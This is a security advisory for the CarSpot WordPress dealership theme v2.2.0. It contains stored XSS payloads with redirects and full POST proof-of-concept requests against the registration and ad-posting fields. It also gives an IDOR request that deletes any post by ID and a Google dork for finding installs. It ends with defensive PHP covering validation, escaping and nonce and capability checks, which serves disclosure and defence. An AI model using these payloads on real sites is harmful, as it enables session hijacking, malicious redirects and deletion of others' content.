CarSpot – Dealership Wordpress Classified Theme v2.2.0 Multiple Vulnerabilities

2020.01.17
m0ze (RU)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: CarSpot – Dealership Wordpress Classified Theme v2.2.0 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/carspot/
# Date: 14/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://scriptsbundle.com/
# Software Link: https://themeforest.net/item/carspot-automotive-car-dealer-wordpress-classified-theme/20195539
# Version: 2.2.0
# Tested on: Kali Linux
# CVE: -
# CWE: 79, 639

----[]- Info: -[]----

Demo website: https://carspot.scriptsbundle.com/
Demo Profile #0: https://carspot.scriptsbundle.com/dealer/m0ze-1054757240/
Demo Profile #1: https://carspot.scriptsbundle.com/dealer/greetzfromm0ze/
Demo Profile #2: https://carspot.scriptsbundle.com/dealer/jibom21023/

----[]- Persistent XSS -> Registration Form/User Profile: -[]----

Any cookie-stealing payload can be stored to hijack a user or administrator session, or to force a redirect to a malicious website.
Vulnerable input field: «Mobile Number».

Payload Sample:
"><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0 ...
Referer: https://carspot.scriptsbundle.com/register/
Cookie: _your_cookies_here_

action=sb_register_user&sb_data=sb_reg_name%3Dm0ze%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%252F%252F%2522%253E%26sb_reg_contact%3D%2522%253E%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%253Bwindow.location%253D%2560https%253A%252F%252Fm0ze.ru%2560%253B%252F%252F%2522%253E%26sb_reg_email%3Dm0ze%2540was.here%26sb_reg_password%3Dasdasd%26sb_user_type%3Ddealer%26minimal-checkbox-1%3Don%26is_captcha%3Dno

----[]- Persistent XSS -> Ad Post -[]----

Any cookie-stealing payload can be stored to hijack a user or administrator session, or to force a redirect to a malicious website.
Vulnerable input fields: «Mobile Number», «Address», «Latitude» and «Longitude».

Payload Sample #0:
"><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">

Payload Sample #1:
<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0 ...
Referer: https://carspot.scriptsbundle.com/sell-your-car/
Cookie: _your_cookies_here_

action=sb_ad_posting&sb_data=ad_title=PoC&is_update=&is_level=&country_level=&ad_cat=62&ad_cat_id=227&ad_cat_sub=227&ad_cat_sub_sub=228&ad_price=1337&ad_price_type=Fixed&ad_avg_hwy=1337&ad_avg_city=1337&ad_mileage=1337&_carspot_ad_condition=166%7CNew&_carspot_ad_type=76%7CBuy&_carspot_ad_warranty=248%7CYes&_carspot_ad_years=36%7C2013&_carspot_ad_body_types=118%7CHatchback&_carspot_ad_transmissions=67%7CAutomatic&_carspot_ad_engine_capacities=44%7C3500&_carspot_ad_engine_types=126%7CHybrid&_carspot_ad_assembles=131%7CImported&_carspot_ad_colors=69%7CBlack&_carspot_ad_insurance=247%7CYes&ad_features%5B%5D=Cool+Box&ad_yvideo=&tags=&ad_description=PoC&sb_total_extra=0&ad_country=230&ad_country_id=293&ad_country_states=293&sb_user_name=m0ze&sb_contact_number=%22%3E%3C!--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D(alert)(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%22%3E&sb_user_address=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Address%60)%2F%2F%22%3E&ad_map_lat=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Latitude%60)%2F%2F%22%3E&ad_map_long=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Longitude%60)%2F%2F%22%3E&sb_make_it_feature=on&is_update=

----[]- IDOR: -[]----

Delete any post/page/ad:

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0 ...
Referer: https://carspot.scriptsbundle.com/search-cars/?carspot_layout_type=4
Cookie: _your_cookies_here_

action=sb_remove_ad&ad_id=XXXX

Where: ad_id=XXXX is the unique WordPress ID of the page/post/ad; it is exposed as a class on the page's <body> tag.

Response:

HTTP/1.1 200 OK
...
1|Ad removed successfully.
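The two bug classes above (CWE-79 in the registration and ad-posting fields, CWE-639 in sb_remove_ad) share one root cause: request parameters are trusted as-is. The PHP below is an added, hypothetical mitigation example written for this page; it is not CarSpot's own code. The function names, the ad post type `ad_post`, the AJAX action and nonce names prefixed `carspot_example_` are assumptions; the field names (`sb_contact_number`, `sb_user_address`, `ad_map_lat`, `ad_map_long`, `ad_id`) come from the PoC requests. Only standard WordPress APIs are used.

```php
<?php
// Added defensive example for the CarSpot advisory (not the theme's own code).
// All carspot_example_* names and the 'ad_post' post type are hypothetical.

// 1. Validate the fields the advisory lists *before* they are stored. A
//    dealer phone number, a latitude or a longitude never legitimately
//    contains '<', '"' or a backtick, so strict formats reject the payloads
//    outright instead of relying on a later filter.
function carspot_example_validate_fields( array $in ) {
    $clean  = array();
    $errors = array();

    // Mobile number: optional leading '+', then digits/space/()/-, 5..20 chars.
    $mobile = sanitize_text_field( $in['sb_contact_number'] ?? '' );
    if ( preg_match( '/^\+?[0-9 ()-]{5,20}$/', $mobile ) ) {
        $clean['sb_contact_number'] = $mobile;
    } else {
        $errors[] = 'sb_contact_number';
    }

    // Address: free text, but all tags are stripped and the length is capped.
    $address = wp_strip_all_tags( (string) ( $in['sb_user_address'] ?? '' ) );
    $clean['sb_user_address'] = mb_substr( $address, 0, 200 );

    // Latitude / longitude: numeric, within range, stored as floats so the
    // database never holds markup for these fields at all.
    foreach ( array( 'ad_map_lat' => 90, 'ad_map_long' => 180 ) as $key => $limit ) {
        $raw = $in[ $key ] ?? '';
        if ( is_numeric( $raw ) && abs( (float) $raw ) <= $limit ) {
            $clean[ $key ] = (float) $raw;
        } else {
            $errors[] = $key;
        }
    }

    return array( 'clean' => $clean, 'errors' => $errors );
}

// 2. Escape on output for the context the value lands in. Validation can be
//    bypassed by older records or other code paths, so the template escapes
//    regardless: esc_attr() inside an attribute, esc_html() between tags.
//    The sample payload starts with '">' precisely to break out of an
//    unescaped value="..." attribute; esc_attr() turns '"' into '&quot;'.
function carspot_example_render_contact( $mobile, $address ) {
    return '<input type="text" name="sb_contact_number" value="'
         . esc_attr( $mobile ) . '">'
         . '<p class="dealer-address">' . esc_html( $address ) . '</p>';
}

// 3. Authorize the delete. The advisory's sb_remove_ad trusts ad_id alone;
//    the fix is a CSRF nonce plus a per-object capability check. Note that
//    only the wp_ajax_ hook is registered, never wp_ajax_nopriv_, so an
//    unauthenticated caller cannot reach the handler at all.
add_action( 'wp_ajax_carspot_example_remove_ad', 'carspot_example_remove_ad' );
function carspot_example_remove_ad() {
    check_ajax_referer( 'carspot_example_remove_ad', 'nonce' );

    $ad_id = isset( $_POST['ad_id'] ) ? absint( $_POST['ad_id'] ) : 0;
    $ad    = $ad_id ? get_post( $ad_id ) : null;

    // Restrict the endpoint to the ad post type (so pages and blog posts can
    // never be removed through it) and ask WordPress whether *this* user may
    // delete *this* post; an author passes for their own ads, an admin for
    // all, anyone else for none.
    if ( ! $ad || 'ad_post' !== $ad->post_type
         || ! current_user_can( 'delete_post', $ad_id ) ) {
        wp_send_json_error( 'Not allowed.', 403 );
    }

    wp_trash_post( $ad_id );
    wp_send_json_success( 'Ad removed successfully.' );
}
```

The nonce for the delete request would be generated in the page template with `wp_create_nonce( 'carspot_example_remove_ad' )` and sent as the `nonce` POST parameter. Using `current_user_can( 'delete_post', $ad_id )` rather than a bare role check is the key difference from the vulnerable pattern: it ties the authorization decision to the specific object named in `ad_id`, which is exactly what CWE-639 describes as missing.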



Copyright 2020, cxsecurity.com